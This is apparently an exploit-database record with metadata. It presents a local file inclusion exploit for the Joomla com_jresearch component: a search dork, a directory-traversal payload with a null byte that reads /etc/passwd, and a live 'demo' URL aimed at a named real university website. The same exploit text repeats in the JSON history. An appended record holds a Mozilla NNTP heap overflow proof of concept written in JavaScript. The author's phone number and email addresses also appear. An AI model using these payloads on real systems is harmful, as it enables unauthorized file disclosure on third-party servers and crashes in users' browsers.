ID 1337DAY-ID-16376
Type zdt
Reporter KedAns-Dz
Modified 2011-06-20T00:00:00
Description
Exploit for php platform in category web applications
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Joomla Component (com_jresearch) Local File Inclusion
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Local File Inclusion
# Tested on : [Windows XP SP3 (Fr)]
##
# +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+
##
# Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming !
# > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ...
# Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3
# +----------+ X==================== S x H x I x T ====================X +----------+
###
# (°) D0rk : inurl:"index.php?option=com_jresearch"
# (+) Exploit & PoC :
http://[host]/[path]/index.php?option=com_jresearch&controller=[LFI]%00
+> &conroller=../../../../../../../../../../../../../../../../../etc/passwd%00
# Demo :
http://sfc2010.univ-reunion.fr/amis/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../../../../../etc/passwd%00
# (^_^) ! Good Luck ALL ...
# 0day.today [2018-03-16] #
{"id": "1337DAY-ID-16376", "bulletinFamily": "exploit", "title": "Joomla Component (com_jresearch) Local File Inclusion", "description": "Exploit for php platform in category web applications", "published": "2011-06-20T00:00:00", "modified": "2011-06-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/16376", "reporter": "KedAns-Dz", "references": [], "cvelist": [], "type": "zdt", "lastseen": "2018-03-16T19:10:52", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": [], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for php platform in category web applications", "edition": 1, "enchantments": {"score": {"modified": "2016-04-19T04:09:26", "value": 6.0}}, "hash": "8262cebfe7d0a6b46cff2a86d5dbf8d79ce9752837fe6c71372285d9d76c5147", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "386367ad639a87d77def111509a7ae2a", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "042520656e1163d6ca41a7531691d7f3", "key": "sourceHref"}, {"hash": "9be53d53bcbc7f128816ebb7d0400687", "key": "title"}, {"hash": "fce756e4682af0c0d3f2a5e27e480d49", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "fce756e4682af0c0d3f2a5e27e480d49", "key": "modified"}, {"hash": "51ffe39dbee3bbfc9ca73813b57b7bfd", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "af76fb253835e7e53597195b251ff8ac", "key": "reporter"}], "history": [], "href": "http://0day.today/exploit/description/16376", "id": "1337DAY-ID-16376", "lastseen": "2016-04-19T04:09:26", "modified": "2011-06-20T00:00:00", "objectVersion": "1.0", "published": "2011-06-20T00:00:00", "references": [], "reporter": "KedAns-Dz", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n###\r\n# Title : Joomla Component (com_jresearch) Local File Inclusion\r\n# Author : KedAns-Dz\r\n# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com\r\n# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)\r\n# Web Site : www.1337day.com * www.exploit-id.com\r\n# Twitter page : twitter.com/kedans\r\n# platform : php\r\n# Impact : Local File Inclusion\r\n# Tested on : [Windows XP SP3 (Fr)]\r\n##\r\n# +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+\r\n##\r\n# Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming !\r\n# > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ...\r\n# Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3\r\n# +----------+ X==================== S x H x I x T ====================X +----------+\r\n###\r\n\r\n# (\u00c2\u00b0) D0rk : inurl:\"index.php?option=com_jresearch\"\r\n\r\n# (+) Exploit & PoC :\r\n\r\nhttp://[host]/[path]/index.php?option=com_jresearch&controller=[LFI]%00\r\n\r\n+> &conroller=../../../../../../../../../../../../../../../../../etc/passwd%00\r\n\r\n# Demo :\r\n\r\nhttp://sfc2010.univ-reunion.fr/amis/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../../../../../etc/passwd%00\r\n\r\n# (^_^) ! Good Luck ALL ...\r\n\r\n\n\n# 0day.today [2016-04-19] #", "sourceHref": "http://0day.today/exploit/16376", "title": "Joomla Component (com_jresearch) Local File Inclusion", "type": "zdt", "viewCount": 0}, "differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:26"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc"}, {"key": "href", "hash": "13060dfb49069817e82f96cfde8b41bf"}, {"key": "modified", "hash": "fce756e4682af0c0d3f2a5e27e480d49"}, {"key": "published", "hash": "fce756e4682af0c0d3f2a5e27e480d49"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "af76fb253835e7e53597195b251ff8ac"}, {"key": "sourceData", "hash": "a06175a58278c2bcad959641d524eadd"}, {"key": "sourceHref", "hash": "f26be7bc154768470ec786e4c0c31d04"}, {"key": "title", "hash": "9be53d53bcbc7f128816ebb7d0400687"}, {"key": "type", "hash": "0678144464852bba10aa2eddf3783f0a"}], "hash": "e4f7ee16df582a3d91d29a3bce32360e9c4dc219d3843c2eb01438e810a1ddb5", "viewCount": 0, "enchantments": {"vulnersScore": 9.3}, "objectVersion": "1.3", "sourceHref": "https://0day.today/exploit/16376", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n###\r\n# Title : Joomla Component (com_jresearch) Local File Inclusion\r\n# Author : KedAns-Dz\r\n# E-mail : [email\u00a0protected] ([email\u00a0protected]) | [email\u00a0protected]\r\n# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)\r\n# Web Site : www.1337day.com * www.exploit-id.com\r\n# Twitter page : twitter.com/kedans\r\n# platform : php\r\n# Impact : Local File Inclusion\r\n# Tested on : [Windows XP SP3 (Fr)]\r\n##\r\n# +----+ xXx < Greetings to 'indoushka' at the Jail > xXx +----+\r\n##\r\n# Noting to all my friends and my Family : (my BAC 2011 is bosh) -> BAC 2012 I will be coming !\r\n# > Hredtha fe elMATH mo3amil 6 & fe lePHYSICs mo3almil 6 tani makan m4k4n pffff (x_x) ...\r\n# Sah kont CaVa em3a le Engineering Elicrtic m034mil 7 ! mes ma3andha ma t3aWedh 3la loKhrin3\r\n# +----------+ X==================== S x H x I x T ====================X +----------+\r\n###\r\n\r\n# (\u00c2\u00b0) D0rk : inurl:\"index.php?option=com_jresearch\"\r\n\r\n# (+) Exploit & PoC :\r\n\r\nhttp://[host]/[path]/index.php?option=com_jresearch&controller=[LFI]%00\r\n\r\n+> &conroller=../../../../../../../../../../../../../../../../../etc/passwd%00\r\n\r\n# Demo :\r\n\r\nhttp://sfc2010.univ-reunion.fr/amis/index.php?option=com_jresearch&controller=../../../../../../../../../../../../../../../../../etc/passwd%00\r\n\r\n# (^_^) ! Good Luck ALL ...\r\n\r\n\n\n# 0day.today [2018-03-16] #"}
{"result": {"zdt": [{"lastseen": "2018-02-09T03:11:50", "references": [], "description": "Exploit for unknown platform in category dos / poc", "edition": 2, "reporter": "Maurycy Prodeus", "published": "2004-12-31T00:00:00", "title": "Mozilla Browser <= 1.7.3 NNTP Code Heap Overflow (PoC)", "type": "zdt", "enchantments": {"score": {"modified": "2018-02-09T03:11:50", "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:C/", "value": 6.3}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2004-12-31T00:00:00", "id": "1337DAY-ID-5936", "href": "https://0day.today/exploit/description/5936", "sourceData": "======================================================\r\nMozilla Browser <= 1.7.3 NNTP Code Heap Overflow (PoC)\r\n======================================================\r\n\r\n\r\n<html>\r\n<script>\r\ni = \"news://news.individual.net/AAAAAAAAAAAAAA?\";\r\nfor(l = 0; l < 16376; l++)\r\ni=i+\"A\";\r\ni=i+\"/?profile/\";\r\nfor(l = 0; l < 16384; l++)\r\ni=i+\"A\";\r\ni=i+\"\\\\\";\r\nwindow.open(i);\r\n</script>\r\n</html>\r\n\r\n\r\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/5936"}]}}